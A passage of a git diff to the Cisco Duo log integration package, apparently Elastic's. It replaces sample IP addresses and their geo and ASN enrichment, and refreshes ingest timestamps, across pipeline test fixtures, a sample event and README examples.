"169.232.89.219" + "ip": "89.160.20.156" }, "event": { "reason": "user_approved", - "ingested": "2021-09-13T18:13:42.697467161Z", - "original": "{\"access_device\":{\"browser\":\"Chrome\",\"browser_version\":\"67.0.3396.99\",\"flash_version\":\"uninstalled\",\"hostname\":null,\"ip\":\"169.232.89.219\",\"is_encryption_enabled\":true,\"is_firewall_enabled\":true,\"is_password_set\":true,\"java_version\":\"uninstalled\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"os\":\"Mac OS X\",\"os_version\":\"10.14.1\",\"security_agents\":[]},\"alias\":\"\",\"application\":{\"key\":\"DIY231J8BR23QK4UKBY8\",\"name\":\"Microsoft Azure Active Directory\"},\"auth_device\":{\"ip\":\"192.168.225.254\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"name\":\"My iPhone X (734-555-2342)\"},\"email\":\"narroway@example.com\",\"event_type\":\"authentication\",\"factor\":\"duo_push\",\"isotimestamp\":\"2020-02-13T18:56:20.351346+00:00\",\"ood_software\":null,\"reason\":\"user_approved\",\"result\":\"success\",\"timestamp\":1581620180,\"trusted_endpoint_status\":\"not trusted\",\"txid\":\"340a23e3-23f3-23c1-87dc-1491a23dfdbb\",\"user\":{\"groups\":[\"Duo Users\",\"CorpHQ Users\"],\"key\":\"DU3KC77WJ06Y5HIV7XKQ\",\"name\":\"narroway@example.com\"}}", + "ingested": "2021-12-14T14:39:14.491566360Z", + "original": "{\"access_device\":{\"browser\":\"Chrome\",\"browser_version\":\"67.0.3396.99\",\"flash_version\":\"uninstalled\",\"hostname\":null,\"ip\":\"89.160.20.156\",\"is_encryption_enabled\":true,\"is_firewall_enabled\":true,\"is_password_set\":true,\"java_version\":\"uninstalled\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"os\":\"Mac OS X\",\"os_version\":\"10.14.1\",\"security_agents\":[]},\"alias\":\"\",\"application\":{\"key\":\"DIY231J8BR23QK4UKBY8\",\"name\":\"Microsoft Azure Active Directory\"},\"auth_device\":{\"ip\":\"192.168.225.254\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"name\":\"My iPhone X (734-555-2342)\"},\"email\":\"narroway@example.com\",\"event_type\":\"authentication\",\"factor\":\"duo_push\",\"isotimestamp\":\"2020-02-13T18:56:20.351346+00:00\",\"ood_software\":null,\"reason\":\"user_approved\",\"result\":\"success\",\"timestamp\":1581620180,\"trusted_endpoint_status\":\"not trusted\",\"txid\":\"340a23e3-23f3-23c1-87dc-1491a23dfdbb\",\"user\":{\"groups\":[\"Duo Users\",\"CorpHQ Users\"],\"key\":\"DU3KC77WJ06Y5HIV7XKQ\",\"name\":\"narroway@example.com\"}}", "kind": "event", "category": "authentication", "type": "info", @@ -76,7 +76,7 @@ "access_device": { "is_password_set": "true", "flash_version": "uninstalled", - "ip": "169.232.89.219", + "ip": "89.160.20.156", "java_version": "uninstalled", "location": { "country": "United States", @@ -114,30 +114,29 @@ }, "related": { "ip": [ - "169.232.89.219", - "169.232.89.112" + "89.160.20.156" ] }, "source": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-CA", - "city_name": "Los Angeles", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "California", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -118.4414, - "lat": 34.0648 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { - "number": 52, + "number": 29518, "organization": { - "name": "University of California, Los Angeles" + "name": "Bredband2 AB" } }, - "address": "169.232.89.219", + "address": "89.160.20.156", "user": { "name": "narroway", "id": "DU3KC77WJ06Y5HIV7XKQ", @@ -148,12 +147,12 @@ ] } }, - "ip": "169.232.89.219" + "ip": "89.160.20.156" }, "event": { "reason": "user_approved", - "ingested": "2021-09-13T18:13:42.697473209Z", - "original": "{\"access_device\":{\"browser\":\"Chrome\",\"browser_version\":\"92.0.4515.107\",\"flash_version\":\"uninstalled\",\"hostname\":null,\"ip\":\"169.232.89.219\",\"is_encryption_enabled\":\"unknown\",\"is_firewall_enabled\":\"unknown\",\"is_password_set\":\"unknown\",\"java_version\":\"uninstalled\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"os\":\"Windows\",\"os_version\":\"10\"},\"alias\":\"\",\"application\":{\"key\":\"DIY231J8BR23QK4UKBY8\",\"name\":\"Duo Access Gateway Launcher\"},\"auth_device\":{\"ip\":\"169.232.89.112\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"name\":\"+91 12345 12345\"},\"email\":\"narroway@example.com\",\"event_type\":\"authentication\",\"factor\":\"duo_push\",\"isotimestamp\":\"2021-07-23T07:21:51.271776+00:00\",\"ood_software\":null,\"reason\":\"user_approved\",\"result\":\"success\",\"timestamp\":1627024911,\"txid\":\"fa59a691-9139-43e9-9854-f9e1dbf72af5\",\"user\":{\"groups\":[\"AD Sync\"],\"key\":\"DU3KC77WJ06Y5HIV7XKQ\",\"name\":\"narroway\"}}", + "ingested": "2021-12-14T14:39:14.491569010Z", + "original": "{\"access_device\":{\"browser\":\"Chrome\",\"browser_version\":\"92.0.4515.107\",\"flash_version\":\"uninstalled\",\"hostname\":null,\"ip\":\"89.160.20.156\",\"is_encryption_enabled\":\"unknown\",\"is_firewall_enabled\":\"unknown\",\"is_password_set\":\"unknown\",\"java_version\":\"uninstalled\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"os\":\"Windows\",\"os_version\":\"10\"},\"alias\":\"\",\"application\":{\"key\":\"DIY231J8BR23QK4UKBY8\",\"name\":\"Duo Access Gateway Launcher\"},\"auth_device\":{\"ip\":\"89.160.20.156\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"name\":\"+91 12345 12345\"},\"email\":\"narroway@example.com\",\"event_type\":\"authentication\",\"factor\":\"duo_push\",\"isotimestamp\":\"2021-07-23T07:21:51.271776+00:00\",\"ood_software\":null,\"reason\":\"user_approved\",\"result\":\"success\",\"timestamp\":1627024911,\"txid\":\"fa59a691-9139-43e9-9854-f9e1dbf72af5\",\"user\":{\"groups\":[\"AD Sync\"],\"key\":\"DU3KC77WJ06Y5HIV7XKQ\",\"name\":\"narroway\"}}", "kind": "event", "category": "authentication", "type": "info", @@ -182,7 +181,7 @@ "access_device": { "is_password_set": "unknown", "flash_version": "uninstalled", - "ip": "169.232.89.219", + "ip": "89.160.20.156", "java_version": "uninstalled", "location": { "country": "United States", @@ -201,22 +200,22 @@ "factor": "duo_push", "auth_device": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-CA", - "city_name": "Los Angeles", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "California", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -118.4414, - "lat": 34.0648 + "lon": 15.6167, + "lat": 58.4167 } }, "name": "+91 12345 12345", "as": { - "number": 52, + "number": 29518, "organization": { - "name": "University of California, Los Angeles" + "name": "Bredband2 AB" } }, "location": { @@ -224,7 +223,7 @@ "city": "Ann Arbor", "state": "Michigan" }, - "ip": "169.232.89.112" + "ip": "89.160.20.156" }, "email": "narroway@example.com" } @@ -237,30 +236,29 @@ }, "related": { "ip": [ - "169.232.89.219", - "169.232.89.112" + "89.160.20.156" ] }, "source": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-CA", - "city_name": "Los Angeles", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "California", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -118.4414, - "lat": 34.0648 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { - "number": 52, + "number": 29518, "organization": { - "name": "University of California, Los Angeles" + "name": "Bredband2 AB" } }, - "address": "169.232.89.219", + "address": "89.160.20.156", "user": { "name": "narroway", "id": "DU3KC77WJ06Y5HIV7XKQ", @@ -271,12 +269,12 @@ ] } }, - "ip": "169.232.89.219" + "ip": "89.160.20.156" }, "event": { "reason": "user_approved", - "ingested": "2021-09-13T18:13:42.697475502Z", - "original": "{\"access_device\":{\"browser\":\"Chrome\",\"browser_version\":\"92.0.4515.131\",\"flash_version\":\"uninstalled\",\"hostname\":null,\"ip\":\"169.232.89.219\",\"is_encryption_enabled\":\"unknown\",\"is_firewall_enabled\":\"unknown\",\"is_password_set\":\"unknown\",\"java_version\":\"uninstalled\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"os\":\"Windows\",\"os_version\":\"10\"},\"alias\":\"\",\"application\":{\"key\":\"DIY231J8BR23QK4UKBY8\",\"name\":\"Duo Access Gateway Launcher\"},\"auth_device\":{\"ip\":\"169.232.89.112\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"name\":\"+91 12345 12345\"},\"email\":\"narroway@example.com\",\"event_type\":\"authentication\",\"factor\":\"duo_push\",\"isotimestamp\":\"2021-08-12T09:14:23.060168+00:00\",\"ood_software\":null,\"reason\":\"user_approved\",\"result\":\"success\",\"timestamp\":1628759663,\"txid\":\"861a81e7-1f60-4865-95eb-57d9c43ce073\",\"user\":{\"groups\":[\"AD Sync\"],\"key\":\"DU3KC77WJ06Y5HIV7XKQ\",\"name\":\"narroway\"}}", + "ingested": "2021-12-14T14:39:14.491569481Z", + "original": "{\"access_device\":{\"browser\":\"Chrome\",\"browser_version\":\"92.0.4515.131\",\"flash_version\":\"uninstalled\",\"hostname\":null,\"ip\":\"89.160.20.156\",\"is_encryption_enabled\":\"unknown\",\"is_firewall_enabled\":\"unknown\",\"is_password_set\":\"unknown\",\"java_version\":\"uninstalled\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"os\":\"Windows\",\"os_version\":\"10\"},\"alias\":\"\",\"application\":{\"key\":\"DIY231J8BR23QK4UKBY8\",\"name\":\"Duo Access Gateway Launcher\"},\"auth_device\":{\"ip\":\"89.160.20.156\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"name\":\"+91 12345 12345\"},\"email\":\"narroway@example.com\",\"event_type\":\"authentication\",\"factor\":\"duo_push\",\"isotimestamp\":\"2021-08-12T09:14:23.060168+00:00\",\"ood_software\":null,\"reason\":\"user_approved\",\"result\":\"success\",\"timestamp\":1628759663,\"txid\":\"861a81e7-1f60-4865-95eb-57d9c43ce073\",\"user\":{\"groups\":[\"AD Sync\"],\"key\":\"DU3KC77WJ06Y5HIV7XKQ\",\"name\":\"narroway\"}}", "kind": "event", "category": "authentication", "type": "info", @@ -305,7 +303,7 @@ "access_device": { "is_password_set": "unknown", "flash_version": "uninstalled", - "ip": "169.232.89.219", + "ip": "89.160.20.156", "java_version": "uninstalled", "location": { "country": "United States", @@ -324,22 +322,22 @@ "factor": "duo_push", "auth_device": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-CA", - "city_name": "Los Angeles", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "California", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -118.4414, - "lat": 34.0648 + "lon": 15.6167, + "lat": 58.4167 } }, "name": "+91 12345 12345", "as": { - "number": 52, + "number": 29518, "organization": { - "name": "University of California, Los Angeles" + "name": "Bredband2 AB" } }, "location": { @@ -347,7 +345,7 @@ "city": "Ann Arbor", "state": "Michigan" }, - "ip": "169.232.89.112" + "ip": "89.160.20.156" }, "email": "narroway@example.com" } @@ -360,30 +358,29 @@ }, "related": { "ip": [ - "169.232.89.219", - "169.232.89.112" + "89.160.20.156" ] }, "source": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-CA", - "city_name": "Los Angeles", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "California", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -118.4414, - "lat": 34.0648 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { - "number": 52, + "number": 29518, "organization": { - "name": "University of California, Los Angeles" + "name": "Bredband2 AB" } }, - "address": "169.232.89.219", + "address": "89.160.20.156", "user": { "name": "narroway", "id": "DU3KC77WJ06Y5HIV7XKQ", @@ -393,12 +390,12 @@ ] } }, - "ip": "169.232.89.219" + "ip": "89.160.20.156" }, "event": { "reason": "user_marked_fraud", - "ingested": "2021-09-13T18:13:42.697477468Z", - "original": "{\"access_device\":{\"browser\":\"Chrome\",\"browser_version\":\"92.0.4515.107\",\"flash_version\":\"uninstalled\",\"hostname\":null,\"ip\":\"169.232.89.219\",\"is_encryption_enabled\":\"unknown\",\"is_firewall_enabled\":\"unknown\",\"is_password_set\":\"unknown\",\"java_version\":\"uninstalled\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"os\":\"Windows\",\"os_version\":\"10\"},\"alias\":\"\",\"application\":{\"key\":\"DIY231J8BR23QK4UKBY8\",\"name\":\"Duo Access Gateway Launcher\"},\"auth_device\":{\"ip\":\"169.232.89.112\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"name\":\"+91 12345 12345\"},\"email\":\"\",\"event_type\":\"authentication\",\"factor\":\"duo_push\",\"isotimestamp\":\"2021-07-23T07:20:54.700050+00:00\",\"ood_software\":null,\"reason\":\"user_marked_fraud\",\"result\":\"fraud\",\"timestamp\":1627024854,\"txid\":\"78e1a910-350b-4226-828b-edb0ac2f2e3c\",\"user\":{\"groups\":[\"AD Sync\"],\"key\":\"DU3KC77WJ06Y5HIV7XKQ\",\"name\":\"narroway\"}}", + "ingested": "2021-12-14T14:39:14.491569897Z", + "original": "{\"access_device\":{\"browser\":\"Chrome\",\"browser_version\":\"92.0.4515.107\",\"flash_version\":\"uninstalled\",\"hostname\":null,\"ip\":\"89.160.20.156\",\"is_encryption_enabled\":\"unknown\",\"is_firewall_enabled\":\"unknown\",\"is_password_set\":\"unknown\",\"java_version\":\"uninstalled\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"os\":\"Windows\",\"os_version\":\"10\"},\"alias\":\"\",\"application\":{\"key\":\"DIY231J8BR23QK4UKBY8\",\"name\":\"Duo Access Gateway Launcher\"},\"auth_device\":{\"ip\":\"89.160.20.156\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"name\":\"+91 12345 12345\"},\"email\":\"\",\"event_type\":\"authentication\",\"factor\":\"duo_push\",\"isotimestamp\":\"2021-07-23T07:20:54.700050+00:00\",\"ood_software\":null,\"reason\":\"user_marked_fraud\",\"result\":\"fraud\",\"timestamp\":1627024854,\"txid\":\"78e1a910-350b-4226-828b-edb0ac2f2e3c\",\"user\":{\"groups\":[\"AD Sync\"],\"key\":\"DU3KC77WJ06Y5HIV7XKQ\",\"name\":\"narroway\"}}", "kind": "event", "category": "authentication", "type": "info", @@ -426,7 +423,7 @@ "access_device": { "is_password_set": "unknown", "flash_version": "uninstalled", - "ip": "169.232.89.219", + "ip": "89.160.20.156", "java_version": "uninstalled", "location": { "country": "United States", @@ -445,22 +442,22 @@ "factor": "duo_push", "auth_device": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-CA", - "city_name": "Los Angeles", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "California", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -118.4414, - "lat": 34.0648 + "lon": 15.6167, + "lat": 58.4167 } }, "name": "+91 12345 12345", "as": { - "number": 52, + "number": 29518, "organization": { - "name": "University of California, Los Angeles" + "name": "Bredband2 AB" } }, "location": { @@ -468,7 +465,7 @@ "city": "Ann Arbor", "state": "Michigan" }, - "ip": "169.232.89.112" + "ip": "89.160.20.156" } } } @@ -480,30 +477,29 @@ }, "related": { "ip": [ - "169.232.89.219", - "169.232.89.112" + "89.160.20.156" ] }, "source": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-CA", - "city_name": "Los Angeles", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "California", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -118.4414, - "lat": 34.0648 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { - "number": 52, + "number": 29518, "organization": { - "name": "University of California, Los Angeles" + "name": "Bredband2 AB" } }, - "address": "169.232.89.219", + "address": "89.160.20.156", "user": { "name": "narroway", "id": "DU3KC77WJ06Y5HIV7XKQ", @@ -513,12 +509,12 @@ ] } }, - "ip": "169.232.89.219" + "ip": "89.160.20.156" }, "event": { "reason": "user_mistake", - "ingested": "2021-09-13T18:13:42.697479425Z", - "original": "{\"access_device\":{\"browser\":\"Chrome\",\"browser_version\":\"92.0.4515.107\",\"flash_version\":\"uninstalled\",\"hostname\":null,\"ip\":\"169.232.89.219\",\"is_encryption_enabled\":\"unknown\",\"is_firewall_enabled\":\"unknown\",\"is_password_set\":\"unknown\",\"java_version\":\"uninstalled\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"os\":\"Windows\",\"os_version\":\"10\"},\"alias\":\"\",\"application\":{\"key\":\"DIY231J8BR23QK4UKBY8\",\"name\":\"Duo Access Gateway Launcher\"},\"auth_device\":{\"ip\":\"169.232.89.112\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"name\":\"+91 12345 12345\"},\"email\":\"\",\"event_type\":\"authentication\",\"factor\":\"duo_push\",\"isotimestamp\":\"2021-07-23T07:19:34.702203+00:00\",\"ood_software\":null,\"reason\":\"user_mistake\",\"result\":\"denied\",\"timestamp\":1627024774,\"txid\":\"e22120cd-7388-424f-aa0a-b60cad42d8f3\",\"user\":{\"groups\":[\"AD Sync\"],\"key\":\"DU3KC77WJ06Y5HIV7XKQ\",\"name\":\"narroway\"}}", + "ingested": "2021-12-14T14:39:14.491570308Z", + "original": "{\"access_device\":{\"browser\":\"Chrome\",\"browser_version\":\"92.0.4515.107\",\"flash_version\":\"uninstalled\",\"hostname\":null,\"ip\":\"89.160.20.156\",\"is_encryption_enabled\":\"unknown\",\"is_firewall_enabled\":\"unknown\",\"is_password_set\":\"unknown\",\"java_version\":\"uninstalled\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"os\":\"Windows\",\"os_version\":\"10\"},\"alias\":\"\",\"application\":{\"key\":\"DIY231J8BR23QK4UKBY8\",\"name\":\"Duo Access Gateway Launcher\"},\"auth_device\":{\"ip\":\"89.160.20.156\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"name\":\"+91 12345 12345\"},\"email\":\"\",\"event_type\":\"authentication\",\"factor\":\"duo_push\",\"isotimestamp\":\"2021-07-23T07:19:34.702203+00:00\",\"ood_software\":null,\"reason\":\"user_mistake\",\"result\":\"denied\",\"timestamp\":1627024774,\"txid\":\"e22120cd-7388-424f-aa0a-b60cad42d8f3\",\"user\":{\"groups\":[\"AD Sync\"],\"key\":\"DU3KC77WJ06Y5HIV7XKQ\",\"name\":\"narroway\"}}", "kind": "event", "category": "authentication", "type": "info", @@ -546,7 +542,7 @@ "access_device": { "is_password_set": "unknown", "flash_version": "uninstalled", - "ip": "169.232.89.219", + "ip": "89.160.20.156", "java_version": "uninstalled", "location": { "country": "United States", @@ -565,22 +561,22 @@ "factor": "duo_push", "auth_device": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-CA", - "city_name": "Los Angeles", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "California", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -118.4414, - "lat": 34.0648 + "lon": 15.6167, + "lat": 58.4167 } }, "name": "+91 12345 12345", "as": { - "number": 52, + "number": 29518, "organization": { - "name": "University of California, Los Angeles" + "name": "Bredband2 AB" } }, "location": { @@ -588,7 +584,7 @@ "city": "Ann Arbor", "state": "Michigan" }, - "ip": "169.232.89.112" + "ip": "89.160.20.156" } } } diff --git a/packages/cisco_duo/data_stream/auth/sample_event.json b/packages/cisco_duo/data_stream/auth/sample_event.json index f4a78cc771c..0ff4316afc1 100644 --- a/packages/cisco_duo/data_stream/auth/sample_event.json +++ b/packages/cisco_duo/data_stream/auth/sample_event.json @@ -12,7 +12,7 @@ "auth": { "access_device": { "flash_version": "uninstalled", - "ip": "169.232.89.219", + "ip": "89.160.20.156", "is_encryption_enabled": "true", "is_firewall_enabled": "true", "is_password_set": "true", @@ -65,7 +65,7 @@ "dataset": "cisco_duo.auth", "ingested": "2021-09-13T09:25:51Z", "kind": "event", - "original": "{\"access_device\":{\"browser\":\"Chrome\",\"browser_version\":\"67.0.3396.99\",\"flash_version\":\"uninstalled\",\"hostname\":null,\"ip\":\"169.232.89.219\",\"is_encryption_enabled\":true,\"is_firewall_enabled\":true,\"is_password_set\":true,\"java_version\":\"uninstalled\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"os\":\"Mac OS X\",\"os_version\":\"10.14.1\",\"security_agents\":[]},\"alias\":\"\",\"application\":{\"key\":\"DIY231J8BR23QK4UKBY8\",\"name\":\"Microsoft Azure Active Directory\"},\"auth_device\":{\"ip\":\"192.168.225.254\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"name\":\"My iPhone X (734-555-2342)\"},\"email\":\"narroway@example.com\",\"event_type\":\"authentication\",\"factor\":\"duo_push\",\"isotimestamp\":\"2020-02-13T18:56:20.351346+00:00\",\"ood_software\":null,\"reason\":\"user_approved\",\"result\":\"success\",\"timestamp\":1581620180,\"trusted_endpoint_status\":\"not trusted\",\"txid\":\"340a23e3-23f3-23c1-87dc-1491a23dfdbb\",\"user\":{\"groups\":[\"Duo Users\",\"CorpHQ Users\"],\"key\":\"DU3KC77WJ06Y5HIV7XKQ\",\"name\":\"narroway@example.com\"}}", + "original": "{\"access_device\":{\"browser\":\"Chrome\",\"browser_version\":\"67.0.3396.99\",\"flash_version\":\"uninstalled\",\"hostname\":null,\"ip\":\"89.160.20.156\",\"is_encryption_enabled\":true,\"is_firewall_enabled\":true,\"is_password_set\":true,\"java_version\":\"uninstalled\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"os\":\"Mac OS X\",\"os_version\":\"10.14.1\",\"security_agents\":[]},\"alias\":\"\",\"application\":{\"key\":\"DIY231J8BR23QK4UKBY8\",\"name\":\"Microsoft Azure Active Directory\"},\"auth_device\":{\"ip\":\"192.168.225.254\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"name\":\"My iPhone X (734-555-2342)\"},\"email\":\"narroway@example.com\",\"event_type\":\"authentication\",\"factor\":\"duo_push\",\"isotimestamp\":\"2020-02-13T18:56:20.351346+00:00\",\"ood_software\":null,\"reason\":\"user_approved\",\"result\":\"success\",\"timestamp\":1581620180,\"trusted_endpoint_status\":\"not trusted\",\"txid\":\"340a23e3-23f3-23c1-87dc-1491a23dfdbb\",\"user\":{\"groups\":[\"Duo Users\",\"CorpHQ Users\"],\"key\":\"DU3KC77WJ06Y5HIV7XKQ\",\"name\":\"narroway@example.com\"}}", "outcome": "success", "reason": "user_approved", "type": "info" @@ -78,12 +78,12 @@ }, "related": { "ip": [ - "169.232.89.219", + "89.160.20.156", "192.168.225.254" ] }, "source": { - "address": "169.232.89.219", + "address": "89.160.20.156", "as": { "number": 52, "organization": { @@ -102,7 +102,7 @@ "region_iso_code": "US-CA", "region_name": "California" }, - "ip": "169.232.89.219", + "ip": "89.160.20.156", "user": { "email": "narroway@example.com", "group": { diff --git a/packages/cisco_duo/data_stream/offline_enrollment/_dev/test/pipeline/test-offline-enrollment.log-expected.json b/packages/cisco_duo/data_stream/offline_enrollment/_dev/test/pipeline/test-offline-enrollment.log-expected.json index 7f6c510e152..272e6b9241e 100644 --- a/packages/cisco_duo/data_stream/offline_enrollment/_dev/test/pipeline/test-offline-enrollment.log-expected.json +++ b/packages/cisco_duo/data_stream/offline_enrollment/_dev/test/pipeline/test-offline-enrollment.log-expected.json @@ -6,7 +6,7 @@ "version": "1.11.0" }, "event": { - "ingested": "2021-09-13T18:13:45.782940725Z", + "ingested": "2021-12-14T14:39:15.762935151Z", "original": "{\"action\": \"o2fa_user_provisioned\",\"description\": \"{\\\"user_agent\\\": \\\"DuoCredProv/4.0.6.413 (Windows NT 6.3.9600; x64; Server)\\\", \\\"hostname\\\": \\\"WKSW10x64\\\", \\\"factor\\\": \\\"duo_otp\\\"}\",\"isotimestamp\": \"2019-08-30T16:10:05+00:00\",\"object\": \"Acme Laptop Windows Logon\",\"timestamp\": 1567181405,\"username\": \"narroway\"}" }, "user": { diff --git a/packages/cisco_duo/data_stream/summary/_dev/test/pipeline/test-summary.log-expected.json b/packages/cisco_duo/data_stream/summary/_dev/test/pipeline/test-summary.log-expected.json index 9fd101d2557..b0b3ce6bbbe 100644 --- a/packages/cisco_duo/data_stream/summary/_dev/test/pipeline/test-summary.log-expected.json +++ b/packages/cisco_duo/data_stream/summary/_dev/test/pipeline/test-summary.log-expected.json @@ -1,12 +1,12 @@ { "expected": [ { - "@timestamp": "2021-09-13T09:20:25.979604532Z", + "@timestamp": "2021-12-14T14:39:15.922670488Z", "ecs": { "version": "1.11.0" }, "event": { - "ingested": "2021-09-13T09:20:25.979604532Z", + "ingested": "2021-12-14T14:39:15.922670488Z", "original": "{\"response\":{\"admin_count\":6,\"integration_count\":5,\"telephony_credits_remaining\":473,\"user_count\":4},\"stat\":\"OK\"}" }, "tags": [ @@ -22,12 +22,12 @@ } }, { - "@timestamp": "2021-09-13T09:20:25.979613969Z", + "@timestamp": "2021-12-14T14:39:15.922673774Z", "ecs": { "version": "1.11.0" }, "event": { - "ingested": "2021-09-13T09:20:25.979613969Z", + "ingested": "2021-12-14T14:39:15.922673774Z", "original": "{\"response\":{\"admin_count\":3,\"integration_count\":9,\"telephony_credits_remaining\":960,\"user_count\":8},\"stat\":\"OK\"}" }, "tags": [ diff --git a/packages/cisco_duo/data_stream/telephony/_dev/test/pipeline/test-telephony.log-expected.json b/packages/cisco_duo/data_stream/telephony/_dev/test/pipeline/test-telephony.log-expected.json index fb63ea3cadd..663cf527a26 100644 --- a/packages/cisco_duo/data_stream/telephony/_dev/test/pipeline/test-telephony.log-expected.json +++ b/packages/cisco_duo/data_stream/telephony/_dev/test/pipeline/test-telephony.log-expected.json @@ -6,7 +6,7 @@ "version": "1.11.0" }, "event": { - "ingested": "2021-09-13T18:13:46.452267128Z", + "ingested": "2021-12-14T14:39:16.074568052Z", "kind": "event", "original": "{\"context\":\"administrator login\",\"credits\":5,\"isotimestamp\":\"2021-07-22T12:59:30+00:00\",\"phone\":\"+121234512345\",\"timestamp\":1626958770,\"type\":\"phone\"}" }, @@ -28,7 +28,7 @@ "version": "1.11.0" }, "event": { - "ingested": "2021-09-13T18:13:46.452275683Z", + "ingested": "2021-12-14T14:39:16.074571298Z", "kind": "event", "original": "{\"context\":\"verify\",\"credits\":1,\"isotimestamp\":\"2021-08-16T06:03:32+00:00\",\"phone\":\"+121234512345\",\"timestamp\":1629093812,\"type\":\"sms\"}" }, @@ -50,7 +50,7 @@ "version": "1.11.0" }, "event": { - "ingested": "2021-09-13T18:13:46.452278281Z", + "ingested": "2021-12-14T14:39:16.074571820Z", "kind": "event", "original": "{\"context\": \"authentication\",\"credits\": 1,\"isotimestamp\":\"2020-03-20T15:38:12+00:00\",\"phone\":\"+121234512345\",\"timestamp\":1584718692,\"type\":\"sms\"}" }, diff --git a/packages/cisco_duo/docs/README.md b/packages/cisco_duo/docs/README.md index 1444a0b82dc..94bb29b8f4f 100644 --- a/packages/cisco_duo/docs/README.md +++ b/packages/cisco_duo/docs/README.md @@ -179,7 +179,7 @@ An example event for `auth` looks as following: "auth": { "access_device": { "flash_version": "uninstalled", - "ip": "169.232.89.219", + "ip": "89.160.20.156", "is_encryption_enabled": "true", "is_firewall_enabled": "true", "is_password_set": "true", @@ -232,7 +232,7 @@ An example event for `auth` looks as following: "dataset": "cisco_duo.auth", "ingested": "2021-09-13T09:25:51Z", "kind": "event", - "original": "{\"access_device\":{\"browser\":\"Chrome\",\"browser_version\":\"67.0.3396.99\",\"flash_version\":\"uninstalled\",\"hostname\":null,\"ip\":\"169.232.89.219\",\"is_encryption_enabled\":true,\"is_firewall_enabled\":true,\"is_password_set\":true,\"java_version\":\"uninstalled\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"os\":\"Mac OS X\",\"os_version\":\"10.14.1\",\"security_agents\":[]},\"alias\":\"\",\"application\":{\"key\":\"DIY231J8BR23QK4UKBY8\",\"name\":\"Microsoft Azure Active 